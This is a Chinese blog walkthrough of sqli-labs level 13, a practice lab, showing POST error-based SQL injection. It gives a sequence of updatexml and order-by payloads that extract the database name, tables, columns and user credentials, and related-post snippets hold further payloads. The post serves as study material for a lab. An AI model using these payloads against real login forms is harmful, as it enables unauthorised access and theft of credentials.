sqli-labs关卡13(基于post提交的单引号加括号的报错盲注)通关思路

已于 2024-01-16 19:52:04 修改
阅读量247 收藏 3
点赞数 1
分类专栏: sqli-labs靶场 文章标签: sql web安全
于 2023-11-10 11:20:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zyh1588/article/details/134327848
版权

文章目录

前言

此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!

一、回顾第十二关知识点

通过第十二关的学习,我们了解到post注入的基本流程,其实和get注入相差不大,只是注入的地方不一样罢了。

二、靶场第十三关通关思路

  • 1、判断注入点
  • 2、爆字段个数
  • 3、爆数据库名
  • 4、爆数据库表
  • 5、爆数据库列
  • 6、爆数据库关键信息

1、判断注入点

老规矩还是使用万能语句1 or 1=1 和 1 or 1=2发现页面正常,所以排除数字型。输入1'发现报错,报错信息为

You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use
near ‘‘1’’) and password=(‘’) LIMIT 0,1’ at line 1

通过报错信息可以猜测应该是单引号加括号闭合,这里我们试一下构造payload

1') or 1=1#

1') or 1=2#

发现1=1页面正常,1=2页面异常,细心发现页面正常异常没有返回回显内容,所以不能用联合查询了。可以试一试报错注入或者是布尔盲注,我个人喜欢用报错注入。(如图所示)
在这里插入图片描述
在这里插入图片描述

2、爆字段个数

注入语句为

1') order by 3#

在这里插入图片描述
发现3报错,那么显位是2

3、爆数据库名

注入语句为

1') or updatexml(1,concat(0x3a,(select database()),0x3a),1)#

在这里插入图片描述
得数据库名

4、爆数据库表

注入语句为

1') and updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x3a),1)#

在这里插入图片描述
得到关键表名users

5、爆数据库列

注入语句为

1') and updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),0x3a),1)#

1') and updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 2,1),0x3a),1)#

得到列名username,password
在这里插入图片描述
在这里插入图片描述

6、爆数据库关键信息

注入语句为

1') and updatexml(1,concat(0x3a,(select password from users limit 0,1),0x3a),1)#

1') and updatexml(1,concat(0x3a,(select username from users limit 0,1),0x3a),1)#

在这里插入图片描述

在这里插入图片描述
得到关键信息

总结

这一关用的是报错注入,布尔盲注也适用。如果不懂报错注入流程可以看我的文章第五关解析。此文章是小白自己为了巩固sql注入而写的,大佬路过请多指教!

无名小卒且不会安全的zzyyhh
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqllab第十三通关笔记
I_WORM的博客
03-14 299
构造payload:username=a')+or+extractvalue(1,concat(0x7e,database(),0x7e))#报错注入获取表名和字段信息以及敏感内容信息在前几就展示了;欸,又报错了,发现了更多的信息;应该是一个where username=('输入内容')构造payload:username=a')+or+exp(710)#重新构造payload:username=a')+or+1=1#构造payload:username=a')+or1=1#成功获取了数据库名;
sqli-labs第十三
yuqnqi的博客
05-09 379
第二个参数: xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。tip: 还有要注意的地方是,它能够查询的字符串长度最大是32个字符,如果超过32位,我们就需要用函数来查询,比如right(),left(),substr()来截取字符串。构造语句,先用 ') 进行闭合,判断列数是多少,持续增列数,直到返回正确的结果。判断注入点的闭合方式。
SQLi LABS Less-13 报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-21 1万+
SQLi 第十三SQLi-LABS Less-13SQLi-LABS Less 13SQLiLABS Less13SQLi Less 13
sqli-labs靶场(1-22
weixin_51566481的博客
08-16 7326
sqli-labs,sql注入,burpsuit
SQL注入——sqli-labs靶场闯(13~20)
m0re's blog
04-30 1300
本文目录 前言:SQL注入必须要拿下,所以继续学习并在靶场实验。 再次学习SQL注入知识,再补充一些基本知识。 注入通过在URL中修改对应的id值,为正常数字、大数字、字符(单引号、双引号、双单引号括号)、反斜扛 来探测是否存在注入点。 ...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqli-labs配置数据库sqli-labs的数据库文件
03-09
Unable to connect to the database: security sqli-labs通过docker安装时,缺少数据库文件,可以通过这个sql文件直接安装
13SQL注入漏洞(入门)
lqyzkn的博客
08-02 109
内容
sql注入13------报错注入和联合注入
qq_45751902的博客
03-14 486
闭合符 ') or 1=1 # 结果没有回显,可以考虑延时注入,布尔盲注报错注入 但是延时注入对于错误和正确没有时间区别,所以不能用 报错注入有回显,所以布尔盲注就不用了 admin') union select 1,updatexml(1,concat(0x7e,(select database()),0x7e),1)# 既然已经确定是报错注入和联合注入了,那么和前面的差不多了。 ...
sql二次注入-sqli-labs第13
weixin_46784800的博客
11-04 922
获取数据操作 判断所查询数据库中包含的列数 采用post进行参数输入: uname=') order by 3 -- - &passwd=') -- - 通过对查询结果进行排序,发现无法对第三列进行排序,且报错Unknown column ‘3’ in ‘order clause’,则说明所查询数据库中共有两列数据。 判断输出数据与数据库的联系 输入语句 uname=') or 1=1 -- - &passwd=') -- - 可发现界面只有登录成功的提示,则说明该网站为盲注,则
sqli-labs靶场第十三
gou1791241251的博客
12-27 765
paloy:admin’) or (select table_name from information_schema.tables where table_schema=database() limit 0,1)=‘emails’ # 闭合方式为’) 可以使用布尔盲注报错注入
详细讲解双查询注入
weixin_34138255的博客
03-22 333
上一篇文章中,http://leaver.me/archives/2726.html我说双查询很难讲清楚,这次就试着讲一下。读了一些原理性的东西。然后尽量通俗的给大家讲清楚。。在此之前,我们理解一下子查询,查询的键字是select,这个大家都知道。子查询可以简单的理解在一个select语句里还有一个select。里面的这个select语句就是子查询。看一个简单的例子:Sel...
sqli-labs第十三--十五
小人物的博客
06-18 3236
第十三 Double Injection- String- with twist(双注入 - 字符型 - 变形) 看一看它的源代码 POST传值没有任何过滤,@不显示输出,echo $sql;这个语句是我的,为了显示再输入框中的语句是如何显示的 直接闭合,用户名和密码输入“ ‘) or (‘1’) = (‘1%23 ” 双引号里面的语句,前面的单引号括号sql中的括号单引号闭合,...
详细sqli-labs(1-65)通关讲解
m0_67401134的博客
07-30 1万+
如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。...
OceanBase SQL 诊断和调优实践——【DBA从入门到实践】第七期
最新发布
OceanBase分布式数据库的博客
05-20 771
《DBA 从入门到实践》第七期在5月22日(周三)如期而至,为大家讲解:ODP(OceanBase Database Proxy) SQL 路由原理;如何分析 SQL 监控视图;如何阅读和管理 OceanBase SQL 执行计划;最常见的 SQL 调优方式;SQL 性能问题的典型场景和排查思路
sqli-labs第九脚本解释
01-22
sqli-labs第九是一个延时盲注的挑战。在这个挑战中,你需要通过注入语句来判断条件是否为真,并通过延时来判断注入是否成功。 根据你提供的信息,你尝试了时间盲注的方法。你使用了单引号来闭合注入语句,并在其中使用了一个延时函数`sleep(3)`来延时3秒钟。你的请求如下: ``` http://localhost:90/sqli-labs-master/Less-9/?id=1' and (select sleep(3))--+ ``` 这个注入语句的意思是,如果条件为真,那么数据库会延时3秒钟返回结果。通过观察请求的响应时间,你可以判断注入是否成功。 在第十中,你需要使用双引号来闭合注入语句,并且要注意将字符串的双引号变成三引号,以避免闭合的双引号混入其中。 这是sqli-labs第九的脚本解释。如果你有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

无名小卒且不会安全的zzyyhh

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值